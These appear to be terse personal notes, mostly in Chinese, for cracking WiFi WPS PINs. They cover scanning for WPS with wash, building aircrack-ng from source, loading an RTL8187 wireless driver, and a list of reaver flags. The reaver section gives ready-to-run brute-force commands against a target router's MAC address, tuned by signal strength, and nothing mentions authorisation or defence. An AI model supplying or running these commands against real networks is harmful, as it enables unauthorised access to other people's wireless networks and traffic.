1, reaver 扫描wps:
1.3版本
walsh -i wlan0
1.4版本
wash -i wlan0
2, 安装aircrack-ng
- ) sudo apt-get install build-essential
- ) sudo apt-get install libssl-dev
- ) wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
- ) tar -zxvf aircrack-ng-1.1.tar.gz
- ) cd aircrack-ng-1.1
- ) In the aircrack-ng-1.1 directory there is a file called common.mak, use your favorite editor to open the file and scroll down till you see the following line:
- CFLAGS ?= -g -W -Wall -Werror -O3
- Delete the -Werror variable, so that the line now looks like the following. Save and exit.
- CFLAGS ?= -g -W -Wall -O3
3,安装8187网卡
- ) aptitude install wireless-tools firmware-realtek usbutils
- ) 加载无线网卡驱动:insmod rtl8187.ko
- ) 查看无线网卡: iwconfig
- ) 打开网卡: ifconfig wlan0 up
- ) 扫描无线网络:iwlist wlan0 scanning
- ) 扫描到无线网络后(这里是H3C),连接无密钥无线网络:iwconfig wlan0 essid H3C
- ) lsmod
4, reaver:
- -i 监听后接口名称
- -b 目标mac地址
- -a 自动检测目标AP最佳配置
- -S 使用最小的DH key(可以提高PJ速度)
- -vv 显示更多的非严重警告
- -d 即delay每穷举一次的闲置时间 预设为1秒
- -t 即timeout每次穷举等待反馈的最长时间
- -c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
- reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
- 小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子)
- 目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
- 目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t .5 -c 1
- 目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1